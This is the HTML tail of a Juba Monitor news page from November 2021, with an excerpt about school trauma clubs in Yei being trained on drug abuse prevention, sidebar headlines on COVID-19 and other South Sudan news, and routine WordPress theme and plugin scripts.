href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fvp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad%2F&amp;title=VP+Abdelbagi+orders+for+screening+officials+after+contrariety+Covid+tests+abroad" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=VP+Abdelbagi+orders+for+screening+officials+after+contrariety+Covid+tests+abroad&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Fvp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix is-no-featured"><div class="post-list-inner"><div class="col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/school-trauma-clubs-trained-on-drug-abuse-in-yei/" rel="bookmark" title="School trauma clubs trained on drug abuse in Yei">School trauma clubs trained on drug abuse in Yei</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' loading='lazy'/><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-11-11T05:17:00+00:00">11/11/2021</time><time class="updated" datetime="2021-11-10T19:47:48+03:00">10/11/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By Hassan Arun Cosmas At least twenty school trauma club members from eight different primary and secondary schools are attending drug abuse and prevention in Yei River County of central Equatoria State. The course targeted students, pupils and their teachers from the different secondary and primary schools. The training was conducted by Yei Catholic Diocesan counselling centre a local faith base organization. The training aimed to envision a sober and sound minded society and create awareness on the dangers of drug abuse. Another objective was equipping the learners with knowledge...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fschool-trauma-clubs-trained-on-drug-abuse-in-yei%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=School+trauma+clubs+trained+on+drug+abuse+in+Yei&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fschool-trauma-clubs-trained-on-drug-abuse-in-yei%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fschool-trauma-clubs-trained-on-drug-abuse-in-yei%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fschool-trauma-clubs-trained-on-drug-abuse-in-yei%2F&amp;title=School+trauma+clubs+trained+on+drug+abuse+in+Yei" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=School+trauma+clubs+trained+on+drug+abuse+in+Yei&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Fschool-trauma-clubs-trained-on-drug-abuse-in-yei%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--></div><!--#related content--></div></div><!--#single post box outer --></div><!--#page--><aside class="sidebar-wrap col-sm-4 col-xs-12 clearfix" ><div class="ruby-sidebar-sticky"><div class="sidebar-inner"><section id="text-5" class="widget widget_text"><div class="widget-title block-title"><h3>About us in brief</h3></div>			<div class="textwidget"><p><img src="https://www.jubamonitor.com/wp-content/uploads/2016/07/cropped-front.png"/><br />
The Juba Monitor is an independent newspaper based in South Sudan's capital, Juba.</p>
</div>
		</section><section id="bingo_ruby_sb_social_counter_widget-2" class="widget sb-widget sb-widget-social-counter"><div class="widget-title block-title"><h3>stay connected</h3></div>
		<div class="widget-content-wrap">
			<div class="sb-social-counter social-counter-wrap style-1">

				                    <div class="counter-element bg-facebook">
                        <a target="_blank" href="http://facebook.com/TheJubaMonitor" class="facebook" title="facebook">
							<span class="counter-element-inner">
								<i class="fa fa-facebook-square"></i>
								<span class="num-count">0</span>
								<span class="text-count">fans</span>
							</span>
                                                    </a>
                    </div><!--facebook like count -->
                					<div class="counter-element bg-twitter">
						<a target="_blank" href="http://twitter.com/JubaMonitor" class="twitter" title="twitter">
							<span class="counter-element-inner">
								<i class="fa fa-twitter"></i>
								<span class="num-count">0</span>
								<span class="text-count">followers</span>
							</span>
													</a>
					</div><!--twitter follower count -->
				
			</div><!-- #social count wrap -->
		</div><!-- #widget content wrap -->

		</section><section id="bingo_ruby_fanpage_widget-4" class="widget sb-widget sb-widget-fb"><div class="widget-title block-title"><h3>Find us on Facebook</h3></div>
			<div class="widget-content-wrap">
				<div class="fb-container">
					<div id="fb-root"></div>
					<script>(function(d, s, id) {
							var js, fjs = d.getElementsByTagName(s)[0];
							if (d.getElementById(id)) return;
							js = d.createElement(s); js.id = id;
							js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3&appId=1385724821660962";
							fjs.parentNode.insertBefore(js, fjs);
						}(document, 'script', 'facebook-jssdk'));</script>
					<div class="fb-page" data-href="http://facebook.com/TheJubaMonitor" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"></div>
				</div>
			</div>

			</section><section id="bingo_ruby_sb_widget_post-2" class="widget sb-widget sb-widget-post"><div class="widget-title block-title"><h3>latest posts</h3></div><div class="widget-content-wrap"><div class="post-widget-inner style-6"><div class="is-top-row"><article class="post-wrap post-overlay-4"><div class="post-thumb-outer"><div class="post-thumb-overlay"></div><div class="is-bg-thumb post-thumb is-image"><a href="https://www.jubamonitor.com/ministers-two-left-in-doha-over-covid-19/" title="MINISTERS-Two left in Doha over COVID-19" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="206" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/Foreign-Affairs-Minister-MayiikAyiiDeng-540x206.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div><div class="post-header-outer is-header-overlay is-absolute is-light-text"><div class="post-header"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/ministers-two-left-in-doha-over-covid-19/" rel="bookmark" title="MINISTERS-Two left in Doha over COVID-19">MINISTERS-Two left in Doha over COVID-19</a></h2><!--#post title--></div><!--#post header--></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/trinity-energy-tops-2021-continental-award-in-cape-town/" rel="bookmark" title="Trinity Energy tops 2021 continental award in Cape Town">Trinity Energy tops 2021 continental award in Cape Town</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-11-11T05:19:00+00:00">11/11/2021</time><time class="updated" datetime="2021-11-10T19:52:29+03:00">10/11/2021</time></span><!--#meta info date--></div></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/vp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad/" title="VP Abdelbagi orders for screening officials after contrariety Covid tests abroad" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="110" height="85" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/The-Vice-President-for-Service-Cluster-110x85.jpg" class="attachment-bingo_ruby_crop_110x85 size-bingo_ruby_crop_110x85 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/vp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad/" rel="bookmark" title="VP Abdelbagi orders for screening officials after contrariety Covid tests abroad">VP Abdelbagi orders for screening officials after contrariety Covid tests abroad</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-11-11T05:18:00+00:00">11/11/2021</time><time class="updated" datetime="2021-11-10T19:49:57+03:00">10/11/2021</time></span><!--#meta info date--></div></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/school-trauma-clubs-trained-on-drug-abuse-in-yei/" rel="bookmark" title="School trauma clubs trained on drug abuse in Yei">School trauma clubs trained on drug abuse in Yei</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-11-11T05:17:00+00:00">11/11/2021</time><time class="updated" datetime="2021-11-10T19:47:48+03:00">10/11/2021</time></span><!--#meta info date--></div></div></article></div></div><!--#post widget inner --></div><!--#post widget content wrap --></section></div></div></aside></div><!--#page content--></article><!--#single post--></div></div>

		<footer id="footer" class="footer-wrap" >
						<div class="footer-inner is-light-text">
							<div class="column-footer-wrap">
				<div class="ruby-container row">
					<div class="column-footer-inner">
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="flexible-recent-posts-widget-5" class="widget widget_flexible-recent-posts-widget"><div class="frp-widget-wrapper frp-widget-">
	<div class="widget-title block-title"><h3>RECENT POSTS</h3></div>    <div class="frp-clear"></div>
    <ul class="frp-widget">
		        <li class="frp-news">
			<div class="frp-left">
	<a href="https://www.jubamonitor.com/ministers-two-left-in-doha-over-covid-19/"><img width="56" height="56" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/Foreign-Affairs-Minister-MayiikAyiiDeng-150x150.jpg" class="attachment-75x56 size-75x56 wp-post-image" alt="" loading="lazy" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/11/Foreign-Affairs-Minister-MayiikAyiiDeng-150x150.jpg 150w, https://www.jubamonitor.com/wp-content/uploads/2021/11/Foreign-Affairs-Minister-MayiikAyiiDeng-45x45.jpg 45w" sizes="(max-width: 56px) 100vw, 56px" /></a>
</div>
<div class="news-widget-info">
<div class="news-widget-title">
		<a href="https://www.jubamonitor.com/ministers-two-left-in-doha-over-covid-19/" class="news-widget-link">MINISTERS-Two left in Doha over COVID-19</a>
	</div>
<div class="news-widget-elapsed">1 hour ago</div>
</div>
<div class="frp-clear"></div>
        </li>
		    </ul>
	    <div class="frp-all-category-news frp-all-category-news-footer"><a
            href="https://www.jubamonitor.com/category/weekly-state-news/">All news &gt;&gt;</a></div>
	</div>
</section>						</div>
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="bingo_ruby_sb_social_counter_widget-4" class="widget sb-widget sb-widget-social-counter"><div class="widget-title block-title"><h3>stay connected</h3></div>
		<div class="widget-content-wrap">
			<div class="sb-social-counter social-counter-wrap style-1">

				                    <div class="counter-element bg-facebook">
                        <a target="_blank" href="http://facebook.com/TheJubaMonitor" class="facebook" title="facebook">
							<span class="counter-element-inner">
								<i class="fa fa-facebook-square"></i>
								<span class="num-count">0</span>
								<span class="text-count">fans</span>
							</span>
                                                    </a>
                    </div><!--facebook like count -->
                					<div class="counter-element bg-twitter">
						<a target="_blank" href="http://twitter.com/JubaMonitor" class="twitter" title="twitter">
							<span class="counter-element-inner">
								<i class="fa fa-twitter"></i>
								<span class="num-count">0</span>
								<span class="text-count">followers</span>
							</span>
													</a>
					</div><!--twitter follower count -->
				
			</div><!-- #social count wrap -->
		</div><!-- #widget content wrap -->

		</section>						</div>
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="bingo_ruby_fanpage_widget-3" class="widget sb-widget sb-widget-fb"><div class="widget-title block-title"><h3>Find us on Facebook</h3></div>
			<div class="widget-content-wrap">
				<div class="fb-container">
					<div id="fb-root"></div>
					<script>(function(d, s, id) {
							var js, fjs = d.getElementsByTagName(s)[0];
							if (d.getElementById(id)) return;
							js = d.createElement(s); js.id = id;
							js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3&appId=1385724821660962";
							fjs.parentNode.insertBefore(js, fjs);
						}(document, 'script', 'facebook-jssdk'));</script>
					<div class="fb-page" data-href="http://facebook.com/TheJubaMonitor" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"></div>
				</div>
			</div>

			</section>						</div>
					</div>
				</div>
			</div><!--#footer columns-->
							
					<div class="bottom-footer-wrap">
				<div class="ruby-container">
											<div class="bottom-footer-inner">
															<div class="footer-logo">
									<a href="https://www.jubamonitor.com/" class="logo"
									   title="Juba Monitor">
										<img data-no-retina
										     src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg"
										     height="90"
										     width="300"
										     alt="Juba Monitor">
									</a>
								</div>
																						<nav id="ruby-footer-navigation" class="footer-menu-wrap">
									<div class="menu-big-menu-container"><ul id="footer-nav" class="footer-menu-inner"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23"><a href="https://www.jubamonitor.com/category/news-2/">News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10"><a href="https://www.jubamonitor.com/category/sports/">Sports</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a></li>
</ul></div>								</nav>
																				</div>
									</div>
									<div id="footer-copyright" class="footer-copyright-wrap">
						<p>Copyright © 2021 Juba Monitor. All Rights Reserved.</p>
					</div>
							</div>
						</div>
		</footer><!--#footer -->
	</div>
</div>
	<div id="wpcp-error-message" class="msgmsg-box-wpcp hideme"><span>error: </span>Content is protected !!</div>
	<script>
	var timeout_result;
	function show_wpcp_message(smessage)
	{
		if (smessage !== "")
			{
			var smessage_text = '<span>Alert: </span>'+smessage;
			document.getElementById("wpcp-error-message").innerHTML = smessage_text;
			document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp showme";
			clearTimeout(timeout_result);
			timeout_result = setTimeout(hide_message, 3000);
			}
	}
	function hide_message()
	{
		document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp hideme";
	}
	</script>
		<style>
	@media print {
	body * {display: none !important;}
		body:after {
		content: "You are not allowed to print preview this page, Thank you"; }
	}
	</style>
		<style type="text/css">
	#wpcp-error-message {
	    direction: ltr;
	    text-align: center;
	    transition: opacity 900ms ease 0s;
	    z-index: 99999999;
	}
	.hideme {
    	opacity:0;
    	visibility: hidden;
	}
	.showme {
    	opacity:1;
    	visibility: visible;
	}
	.msgmsg-box-wpcp {
		border:1px solid #f5aca6;
		border-radius: 10px;
		color: #555;
		font-family: Tahoma;
		font-size: 11px;
		margin: 10px;
		padding: 10px 36px;
		position: fixed;
		width: 255px;
		top: 50%;
  		left: 50%;
  		margin-top: -10px;
  		margin-left: -130px;
  		-webkit-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
		-moz-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
		box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
	}
	.msgmsg-box-wpcp span {
		font-weight:bold;
		text-transform:uppercase;
	}
		.warning-wpcp {
		background:#ffecec url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/warning.png') no-repeat 10px 50%;
	}
    </style>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/auto-image-alt/js/auto_image_alt.js?ver=1.1' id='auto_image_alt-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/bingo-ruby-core/assets/script.js?ver=1.6' id='bingo_ruby_plugin_scripts-js'></script>
<script type='text/javascript' id='contact-form-7-js-extra'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/www.jubamonitor.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.4' id='contact-form-7-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-modernizr.js?ver=v2.8.3' id='modernizr-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-totop.js?ver=v1.2' id='uitotop-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4' id='imagesloaded-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-waypoints.js?ver=v3.1.1' id='waypoints-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-slick.js?ver=v1.5.8' id='slick-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-tipsy.js?ver=v1.0' id='tipsy-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-magnificpopup.js?ver=v1.1.0' id='magnific-popup-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-justified.js?ver=v1.1.0' id='justified-gallery-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-backstretch.js?ver=v2.0.4' id='backstretch-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-smoothscroll.js?ver=v1.2.1' id='smoothscroll-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-bootstrap.js?ver=v3.0' id='bootstrap-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-fitvids.js?ver=v1.1' id='fitvids-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-sticky.js?ver=v1.0.3' id='sticky-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-rubysticky.js?ver=1.0' id='ruby-sticky-js'></script>
<script type='text/javascript' id='bingo_ruby_script_main-js-extra'>
/* <![CDATA[ */
var bingo_ruby_to_top = "1";
var bingo_ruby_social_tooltip = "1";
var bingo_ruby_single_image_popup = "1";
/* ]]> */
</script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/js/theme-script.js?ver=2.4' id='bingo_ruby_script_main-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/wp-embed.min.js?ver=5.8.2' id='wp-embed-js'></script>
</body>
</html>